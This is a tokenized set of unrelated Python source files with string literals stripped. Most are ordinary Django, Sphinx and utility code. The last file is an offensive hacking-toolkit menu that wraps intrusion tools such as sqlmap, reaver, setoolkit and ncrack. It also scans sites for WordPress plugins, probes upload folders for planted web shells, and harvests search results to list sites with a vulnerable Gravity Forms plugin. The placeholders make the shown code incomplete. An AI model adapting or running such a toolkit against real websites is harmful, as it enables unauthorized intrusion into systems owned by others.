<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> from django . contrib import auth <EOL> from django . core . cache import cache <EOL> from django . core . mail import send_mail <EOL> from django . core . urlresolvers import reverse <EOL> from django . template . loader import render_to_string <EOL> from django . utils . decorators import method_decorator <EOL> from django . views . decorators . csrf import ensure_csrf_cookie <EOL> from django . views . generic import View <EOL> from wwwhisper_auth import http <EOL> from wwwhisper_auth import login_token <EOL> from wwwhisper_auth import models <EOL> from wwwhisper_auth import url_utils <EOL> from wwwhisper_auth . backend import AuthenticationError <EOL> import logging <EOL> import urllib <EOL> logger = logging . getLogger ( __name__ ) <EOL> def get_user ( request ) : <EOL> """<STR_LIT>""" <EOL> user_id = request . session . get ( '<STR_LIT>' , None ) <EOL> if user_id is not None : <EOL> return request . site . users . get_unique ( lambda user : user . id == user_id ) <EOL> return None <EOL> class Auth ( View ) : <EOL> """<STR_LIT>""" <EOL> @ http . never_ever_cache <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> encoded_path = self . _extract_encoded_path_argument ( request ) <EOL> if encoded_path is None : <EOL> return http . HttpResponseBadRequest ( <EOL> "<STR_LIT>" ) <EOL> if '<STR_LIT>' in request . META : <EOL> return http . HttpResponseBadRequest ( <EOL> "<STR_LIT>" ) <EOL> debug_msg = "<STR_LIT>" % ( encoded_path ) <EOL> path_validation_error = None <EOL> if url_utils . contains_fragment ( encoded_path ) : <EOL> path_validation_error = "<STR_LIT>" <EOL> else : <EOL> stripped_path = url_utils . strip_query ( encoded_path ) <EOL> decoded_path = url_utils . decode ( stripped_path ) <EOL> decoded_path = url_utils . collapse_slashes ( decoded_path ) <EOL> if not url_utils . is_canonical ( decoded_path ) : <EOL> path_validation_error = '<STR_LIT>' '<STR_LIT>' <EOL> if path_validation_error is not None : <EOL> logger . debug ( '<STR_LIT>' % ( debug_msg ) ) <EOL> return http . HttpResponseBadRequest ( path_validation_error ) <EOL> user = get_user ( request ) <EOL> location = request . site . locations . find_location ( decoded_path ) <EOL> if user is not None : <EOL> debug_msg += "<STR_LIT>" % ( user . email ) <EOL> respone = None <EOL> if location is not None and location . can_access ( user ) : <EOL> logger . debug ( '<STR_LIT>' % ( debug_msg ) ) <EOL> response = http . HttpResponseOK ( '<STR_LIT>' ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' % ( debug_msg ) ) <EOL> response = http . HttpResponseNotAuthorized ( <EOL> self . _html_or_none ( request , '<STR_LIT>' , <EOL> { '<STR_LIT:email>' : user . email } ) ) <EOL> response [ '<STR_LIT>' ] = user . email <EOL> return response <EOL> if ( location is not None and location . open_access_granted ( ) and <EOL> not location . open_access_requires_login ( ) ) : <EOL> logger . debug ( '<STR_LIT>' <EOL> % ( debug_msg ) ) <EOL> return http . HttpResponseOK ( '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' % ( debug_msg ) ) <EOL> return http . HttpResponseNotAuthenticated ( <EOL> self . _html_or_none ( request , '<STR_LIT>' , request . site . skin ( ) ) ) <EOL> def _html_or_none ( self , request , template , context = { } ) : <EOL> """<STR_LIT>""" <EOL> if ( http . accepts_html ( request . META . get ( '<STR_LIT>' ) ) ) : <EOL> return render_to_string ( template , context ) <EOL> return None <EOL> @ staticmethod <EOL> def _extract_encoded_path_argument ( request ) : <EOL> """<STR_LIT>""" <EOL> request_path_and_args = request . get_full_path ( ) <EOL> assert request_path_and_args . startswith ( request . path ) <EOL> args = request_path_and_args [ len ( request . path ) : ] <EOL> if not args . startswith ( '<STR_LIT>' ) : <EOL> return None <EOL> return args [ len ( '<STR_LIT>' ) : ] <EOL> class CsrfToken ( View ) : <EOL> """<STR_LIT>""" <EOL> @ http . never_ever_cache <EOL> @ method_decorator ( ensure_csrf_cookie ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> return http . HttpResponseNoContent ( ) <EOL> class Login ( http . RestView ) : <EOL> """<STR_LIT>""" <EOL> def post ( self , request , assertion ) : <EOL> """<STR_LIT>""" <EOL> if assertion == None : <EOL> return http . HttpResponseBadRequest ( '<STR_LIT>' ) <EOL> try : <EOL> user = auth . authenticate ( site = request . site , <EOL> site_url = request . site_url , <EOL> assertion = assertion ) <EOL> except AuthenticationError as ex : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return http . HttpResponseBadRequest ( str ( ex ) ) <EOL> if user is not None : <EOL> auth . login ( request , user ) <EOL> request . session [ '<STR_LIT>' ] = user . id <EOL> logger . debug ( '<STR_LIT>' % ( user . email ) ) <EOL> return http . HttpResponseNoContent ( ) <EOL> else : <EOL> return http . HttpResponseNotAuthorized ( ) <EOL> class LoginToken ( View ) : <EOL> """<STR_LIT>""" <EOL> @ http . never_ever_cache <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> token = request . GET . get ( '<STR_LIT>' ) <EOL> if token == None : <EOL> return http . HttpResponseBadRequest ( '<STR_LIT>' ) <EOL> try : <EOL> user = auth . authenticate ( site = request . site , <EOL> site_url = request . site_url , <EOL> token = token ) <EOL> except AuthenticationError as ex : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return http . HttpResponseBadRequest ( str ( ex ) ) <EOL> if user is not None : <EOL> auth . login ( request , user ) <EOL> request . session [ '<STR_LIT>' ] = user . id <EOL> logger . debug ( '<STR_LIT>' % ( user . email ) ) <EOL> redirect_to = request . GET . get ( '<STR_LIT>' ) <EOL> if ( redirect_to is None or <EOL> not url_utils . validate_redirection_target ( redirect_to ) ) : <EOL> redirect_to = '<STR_LIT:/>' <EOL> return http . HttpResponseRedirect ( request . site_url + redirect_to ) <EOL> else : <EOL> return http . HttpResponseNotAuthorized ( ) <EOL> class SendToken ( http . RestView ) : <EOL> @ http . never_ever_cache <EOL> def post ( self , request , email , path ) : <EOL> """<STR_LIT>""" <EOL> if email == None : <EOL> return http . HttpResponseBadRequest ( '<STR_LIT>' ) <EOL> if not models . is_email_valid ( email ) : <EOL> return http . HttpResponseBadRequest ( '<STR_LIT>' ) <EOL> if path is None or not url_utils . validate_redirection_target ( path ) : <EOL> path = '<STR_LIT:/>' <EOL> token = login_token . generate_login_token ( <EOL> request . site , site_url = request . site_url , email = email ) <EOL> params = urllib . urlencode ( dict ( next = path , token = token ) ) <EOL> url = '<STR_LIT>' . format ( <EOL> request . site_url , reverse ( '<STR_LIT>' ) , params ) <EOL> subject = '<STR_LIT>' . format ( request . site_url ) <EOL> from_email = settings . TOKEN_EMAIL_FROM <EOL> body = ( <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' . format ( url ) + <EOL> '<STR_LIT:\n>' + <EOL> '<STR_LIT>' ) <EOL> send_mail ( subject , body , from_email , [ email ] , fail_silently = False ) <EOL> return http . HttpResponseNoContent ( ) <EOL> class Logout ( http . RestView ) : <EOL> """<STR_LIT>""" <EOL> def post ( self , request ) : <EOL> """<STR_LIT>""" <EOL> auth . logout ( request ) <EOL> response = http . HttpResponseNoContent ( ) <EOL> return response <EOL> class WhoAmI ( http . RestView ) : <EOL> """<STR_LIT>""" <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> user = get_user ( request ) <EOL> if user is not None : <EOL> return http . HttpResponseOKJson ( { '<STR_LIT:email>' : user . email } ) <EOL> return http . HttpResponseNotAuthenticated ( ) </s>
<s> def _fix_import_path ( ) : <EOL> """<STR_LIT>""" <EOL> import sys , os <EOL> try : <EOL> import wtforms <EOL> except ImportError : <EOL> parent_dir = os . path . abspath ( os . path . join ( os . path . dirname ( os . path . abspath ( __file__ ) ) , '<STR_LIT:..>' ) ) <EOL> build_lib = os . path . join ( parent_dir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if os . path . isdir ( build_lib ) : <EOL> sys . path . insert ( <NUM_LIT:0> , build_lib ) <EOL> else : <EOL> sys . path . insert ( <NUM_LIT:0> , parent_dir ) <EOL> _fix_import_path ( ) <EOL> extensions = [ '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> today_fmt = '<STR_LIT>' <EOL> pygments_style = '<STR_LIT>' <EOL> html_style = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_last_updated_fmt = '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import absolute_import <EOL> import random <EOL> class BackoffTimer ( object ) : <EOL> def __init__ ( self , ratio = <NUM_LIT:1> , max_interval = None , min_interval = None ) : <EOL> self . c = <NUM_LIT:0> <EOL> self . ratio = ratio <EOL> self . max_interval = max_interval <EOL> self . min_interval = min_interval <EOL> def is_reset ( self ) : <EOL> return self . c == <NUM_LIT:0> <EOL> def reset ( self ) : <EOL> self . c = <NUM_LIT:0> <EOL> return self <EOL> def success ( self ) : <EOL> self . c = max ( self . c - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> return self <EOL> def failure ( self ) : <EOL> self . c += <NUM_LIT:1> <EOL> return self <EOL> def get_interval ( self ) : <EOL> k = pow ( <NUM_LIT:2> , self . c ) - <NUM_LIT:1> <EOL> interval = random . random ( ) * k * self . ratio <EOL> if self . max_interval is not None : <EOL> interval = min ( interval , self . max_interval ) <EOL> if self . min_interval is not None : <EOL> interval = max ( interval , self . min_interval ) <EOL> return interval </s>
<s> VERSION = ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) </s>
<s> from django . core . urlresolvers import get_resolver <EOL> from devil import Resource <EOL> try : <EOL> from collections import OrderedDict as dict <EOL> except ImportError : <EOL> pass <EOL> class DocumentedResource ( Resource ) : <EOL> """<STR_LIT>""" <EOL> methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> def get_documentation ( self , request , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = self . name ( ) <EOL> ret [ '<STR_LIT>' ] = self . _get_url_doc ( ) <EOL> ret [ '<STR_LIT:description>' ] = self . __doc__ <EOL> ret [ '<STR_LIT>' ] = self . _get_representation_doc ( ) <EOL> ret [ '<STR_LIT>' ] = self . _get_method_doc ( ) <EOL> return ret <EOL> def _serialize_object ( self , response_data , request ) : <EOL> """<STR_LIT>""" <EOL> if self . _is_doc_request ( request ) : <EOL> return response_data <EOL> else : <EOL> return super ( DocumentedResource , self ) . _serialize_object ( <EOL> response_data , request ) <EOL> def _validate_output_data ( <EOL> self , original_res , serialized_res , formatted_res , request ) : <EOL> """<STR_LIT>""" <EOL> if self . _is_doc_request ( request ) : <EOL> return <EOL> else : <EOL> return super ( DocumentedResource , self ) . _validate_output_data ( <EOL> original_res , serialized_res , formatted_res , request ) <EOL> def _get_method ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if self . _is_doc_request ( request ) : <EOL> return self . get_documentation <EOL> else : <EOL> return super ( DocumentedResource , self ) . _get_method ( request ) <EOL> def _is_doc_request ( self , request ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' in request . GET <EOL> def _get_representation_doc ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . representation : <EOL> return '<STR_LIT>' <EOL> fields = { } <EOL> for name , field in self . representation . fields . items ( ) : <EOL> fields [ name ] = self . _get_field_doc ( field ) <EOL> return fields <EOL> def _get_field_doc ( self , field ) : <EOL> """<STR_LIT>""" <EOL> fieldspec = dict ( ) <EOL> fieldspec [ '<STR_LIT:type>' ] = field . __class__ . __name__ <EOL> fieldspec [ '<STR_LIT>' ] = field . required <EOL> fieldspec [ '<STR_LIT>' ] = [ { validator . __class__ . __name__ : validator . __dict__ } for validator in field . validators ] <EOL> return fieldspec <EOL> def _get_url_doc ( self ) : <EOL> """<STR_LIT>""" <EOL> resolver = get_resolver ( None ) <EOL> possibilities = resolver . reverse_dict . getlist ( self ) <EOL> urls = [ possibility [ <NUM_LIT:0> ] for possibility in possibilities ] <EOL> return urls <EOL> def _get_method_doc ( self ) : <EOL> """<STR_LIT>""" <EOL> ret = { } <EOL> for method_name in self . methods : <EOL> method = getattr ( self , method_name , None ) <EOL> if method : <EOL> ret [ method_name ] = method . __doc__ <EOL> return ret </s>
<s> from django import forms <EOL> from django . core . exceptions import ValidationError <EOL> from simple import models <EOL> class Person ( forms . ModelForm ) : <EOL> def validate ( self , data ) : <EOL> spec = self . __class__ ( data ) <EOL> if not spec . is_valid ( ) : <EOL> raise ValidationError ( spec . errors ) <EOL> if len ( set ( data ) - set ( spec . fields ) ) > <NUM_LIT:0> : <EOL> raise ValidationError ( '<STR_LIT>' ) <EOL> return spec . cleaned_data <EOL> id = forms . Field ( required = False ) <EOL> class Meta : <EOL> model = models . Person </s>
<s> import scripts . common . feature_extractors as feature_extractors <EOL> import scripts . common . file_utils as file_utils <EOL> import matplotlib . pyplot as plt <EOL> def test_paddle_positions ( ) : <EOL> ball_pos = ( ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> prev_ball_pos = ( ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> weights = file_utils . load_weights ( ) <EOL> mbb = feature_extractors . MockBoundingBoxExtractor ( ball_pos , prev_ball_pos ) <EOL> domain = [ ] <EOL> range_weights = [ ] <EOL> actions = [ <NUM_LIT:3> , <NUM_LIT:4> ] <EOL> for x in range ( <NUM_LIT:0> , <NUM_LIT:100> ) : <EOL> state = { } <EOL> best_score = None <EOL> features = mbb . get_features_paddle_x ( state , actions , x ) <EOL> for feature_set in features : <EOL> score = <NUM_LIT:0> <EOL> for f , v in feature_set : <EOL> score += weights [ f ] * v <EOL> if best_score == None or score > best_score : <EOL> best_score = score <EOL> if best_score != None : <EOL> domain . append ( x ) <EOL> range_weights . append ( best_score ) <EOL> plt . scatter ( domain , range_weights ) <EOL> plt . show ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test_paddle_positions ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( __file__ ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' </s>
<s> import sys <EOL> import os <EOL> import time <EOL> import httplib <EOL> import subprocess <EOL> import re , urllib2 <EOL> import socket <EOL> import urllib , sys , json <EOL> import telnetlib <EOL> import glob <EOL> import random <EOL> import Queue <EOL> import threading <EOL> from getpass import getpass <EOL> from commands import * <EOL> from sys import argv <EOL> from platform import system <EOL> from urlparse import urlparse <EOL> from xml . dom import minidom <EOL> from optparse import OptionParser <EOL> from time import sleep <EOL> yes = set ( [ '<STR_LIT:yes>' , '<STR_LIT:y>' , '<STR_LIT>' , '<STR_LIT:Y>' ] ) <EOL> no = set ( [ '<STR_LIT>' , '<STR_LIT:n>' ] ) <EOL> def logo ( ) : <EOL> print """<STR_LIT>""" <EOL> def menu ( ) : <EOL> print ( """<STR_LIT>""" ) <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if choice == "<STR_LIT:1>" : <EOL> info ( ) <EOL> elif choice == "<STR_LIT:2>" : <EOL> passwd ( ) <EOL> elif choice == "<STR_LIT:3>" : <EOL> wire ( ) <EOL> elif choice == "<STR_LIT:4>" : <EOL> exp ( ) <EOL> elif choice == "<STR_LIT:5>" : <EOL> snif ( ) <EOL> elif choice == "<STR_LIT>" : <EOL> webhack ( ) <EOL> elif choice == "<STR_LIT>" : <EOL> tnn ( ) <EOL> elif choice == "<STR_LIT>" : <EOL> clearScr ( ) , sys . exit ( ) ; <EOL> elif choice == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def h2ip ( ) : <EOL> host = raw_input ( "<STR_LIT>" ) <EOL> ips = socket . gethostbyname ( host ) <EOL> print ( ips ) <EOL> def ports ( ) : <EOL> clearScr ( ) <EOL> target = raw_input ( '<STR_LIT>' ) <EOL> os . system ( "<STR_LIT>" % target ) <EOL> sys . exit ( ) ; <EOL> def ifinurl ( ) : <EOL> print """<STR_LIT>""" <EOL> print ( '<STR_LIT>' ) <EOL> cinurl = raw_input ( "<STR_LIT>" ) <EOL> if cinurl in yes : <EOL> inurl ( ) <EOL> if cinurl in no : <EOL> menu ( ) <EOL> elif cinurl == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def commix ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choicecmx = raw_input ( "<STR_LIT>" ) <EOL> if choicecmx in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> elif choicecmx in no : <EOL> os . system ( '<STR_LIT>' ) ; info ( ) <EOL> def pixiewps ( ) : <EOL> print """<STR_LIT>""" <EOL> choicewps = raw_input ( "<STR_LIT>" ) <EOL> if choicewps in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> if choicewps in no : <EOL> menu ( ) <EOL> elif choicewps == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def webhack ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choiceweb = raw_input ( "<STR_LIT>" ) <EOL> if choiceweb == "<STR_LIT:1>" : <EOL> clearScr ( ) <EOL> maine ( ) <EOL> if choiceweb == "<STR_LIT:2>" : <EOL> clearScr ( ) ; ifinurl ( ) <EOL> if choiceweb == '<STR_LIT:3>' : <EOL> clearScr ( ) ; wppjmla ( ) <EOL> if choiceweb == "<STR_LIT:4>" : <EOL> clearScr ( ) ; gravity ( ) <EOL> if choiceweb == "<STR_LIT:5>" : <EOL> clearScr ( ) ; sqlscan ( ) <EOL> if choiceweb == "<STR_LIT>" : <EOL> clearScr ( ) ; wpminiscanner ( ) <EOL> if choiceweb == "<STR_LIT>" : <EOL> clearScr ( ) ; wppluginscan ( ) <EOL> if choiceweb == "<STR_LIT>" : <EOL> clearScr ( ) ; shelltarget ( ) <EOL> elif choiceweb == "<STR_LIT>" : <EOL> menu ( ) <EOL> elif choiceweb == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def inurl ( ) : <EOL> dork = raw_input ( "<STR_LIT>" ) <EOL> output = raw_input ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" . format ( dork , output ) ) <EOL> if cinurl in no : <EOL> insinurl ( ) <EOL> elif cinurl == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def insinurl ( ) : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> clearScr ( ) <EOL> inurl ( ) <EOL> def nmap ( ) : <EOL> choice7 = raw_input ( "<STR_LIT>" ) <EOL> if choice7 in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> elif choice7 in no : <EOL> info ( ) <EOL> elif choice7 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def jboss ( ) : <EOL> os . system ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choice9 = raw_input ( "<STR_LIT>" ) <EOL> if choice9 in yes : <EOL> os . system ( "<STR_LIT>" ) , sys . exit ( ) ; <EOL> elif choice9 in no : <EOL> os . system ( '<STR_LIT>' ) ; exp ( ) <EOL> elif choice9 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def wppluginscan ( ) : <EOL> Notfound = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> sitesfile = raw_input ( "<STR_LIT>" ) <EOL> filepath = raw_input ( "<STR_LIT>" ) <EOL> def scan ( site , dir ) : <EOL> global resp <EOL> try : <EOL> conn = httplib . HTTPConnection ( site ) <EOL> conn . request ( '<STR_LIT>' , "<STR_LIT>" + dir ) <EOL> resp = conn . getresponse ( ) . status <EOL> except ( ) , message : <EOL> print "<STR_LIT>" , message <EOL> pass <EOL> def timer ( ) : <EOL> now = time . localtime ( time . time ( ) ) <EOL> return time . asctime ( now ) <EOL> def main ( ) : <EOL> sites = open ( sitesfile ) . readlines ( ) <EOL> plugins = open ( filepath ) . readlines ( ) <EOL> for site in sites : <EOL> site = site . rstrip ( ) <EOL> for plugin in plugins : <EOL> plugin = plugin . rstrip ( ) <EOL> scan ( site , plugin ) <EOL> if resp not in Notfound : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" + site <EOL> print "<STR_LIT>" + plugin <EOL> print "<STR_LIT>" , resp <EOL> def sqlmap ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> choice8 = raw_input ( "<STR_LIT>" ) <EOL> if choice8 in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> elif choice8 in no : <EOL> os . system ( '<STR_LIT>' ) ; info ( ) <EOL> elif choice8 == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> directories = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> shells = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> upload = [ ] <EOL> def grabuploadedlink ( url ) : <EOL> try : <EOL> for dir in directories : <EOL> currentcode = urllib . urlopen ( url + dir ) . getcode ( ) <EOL> if currentcode == <NUM_LIT:200> or currentcode == <NUM_LIT> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" + str ( url + dir ) + "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> upload . append ( url + dir ) <EOL> except : <EOL> pass <EOL> def grabshell ( url ) : <EOL> try : <EOL> for upl in upload : <EOL> for shell in shells : <EOL> currentcode = urllib . urlopen ( upl + shell ) . getcode ( ) <EOL> if currentcode == <NUM_LIT:200> : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" + str ( upl + shell ) + "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> except : <EOL> pass <EOL> def shelltarget ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> line = raw_input ( "<STR_LIT>" ) <EOL> line = line . rstrip ( ) <EOL> grabuploadedlink ( line ) <EOL> grabshell ( line ) <EOL> def setoolkit ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choiceset = raw_input ( "<STR_LIT>" ) <EOL> if choiceset in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> if choiceset in no : <EOL> clearScr ( ) ; info ( ) <EOL> elif choiceset == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def cupp ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choicecupp = raw_input ( "<STR_LIT>" ) <EOL> if choicecupp in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> elif choicecupp in no : <EOL> clearScr ( ) ; passwd ( ) <EOL> elif choicecupp == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def ncrack ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> choicencrack = raw_input ( "<STR_LIT>" ) <EOL> if choicencrack in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> elif choicencrack in no : <EOL> clearScr ( ) ; passwd ( ) <EOL> elif choicencrack == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def reaver ( ) : <EOL> print """<STR_LIT>""" <EOL> creaver = raw_input ( "<STR_LIT>" ) <EOL> if creaver in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> elif creaver in no : <EOL> clearScr ( ) ; wire ( ) <EOL> elif creaver == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def ssls ( ) : <EOL> print """<STR_LIT>""" <EOL> cssl = raw_input ( "<STR_LIT>" ) <EOL> if cssl in yes : <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> if cssl in no : <EOL> snif ( ) <EOL> elif cssl == "<STR_LIT>" : <EOL> menu ( ) <EOL> else : <EOL> menu ( ) <EOL> def unique ( seq ) : <EOL> seen = set ( ) <EOL> return [ seen . add ( x ) or x for x in seq if x not in seen ] <EOL> def bing_all_grabber ( s ) : <EOL> lista = [ ] <EOL> page = <NUM_LIT:1> <EOL> while page <= <NUM_LIT> : <EOL> try : <EOL> bing = "<STR_LIT>" + s + "<STR_LIT>" + str ( page ) <EOL> openbing = urllib2 . urlopen ( bing ) <EOL> readbing = openbing . read ( ) <EOL> findwebs = re . findall ( '<STR_LIT>' , readbing ) <EOL> for i in range ( len ( findwebs ) ) : <EOL> allnoclean = findwebs [ i ] <EOL> findall1 = re . findall ( '<STR_LIT>' , allnoclean ) <EOL> for idx , item in enumerate ( findall1 ) : <EOL> if '<STR_LIT>' not in item : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> else : <EOL> findall1 [ idx ] = '<STR_LIT>' + item + '<STR_LIT:/>' <EOL> lista . extend ( findall1 ) <EOL> page += <NUM_LIT:50> <EOL> except urllib2 . URLError : <EOL> pass <EOL> final = unique ( lista ) <EOL> return final <EOL> def check_gravityforms ( sites ) : <EOL> import urllib <EOL> gravityforms = [ ] <EOL> for site in sites : <EOL> try : <EOL> if urllib . urlopen ( site + '<STR_LIT>' ) . getcode ( ) == <NUM_LIT> : <EOL> gravityforms . append ( site ) <EOL> except : <EOL> pass <EOL> return gravityforms <EOL> def gravity ( ) : <EOL> ip = raw_input ( '<STR_LIT>' ) <EOL> sites = bing_all_grabber ( str ( ip ) ) <EOL> gravityforms = check_gravityforms ( sites ) <EOL> for ss in gravityforms : <EOL> print ss 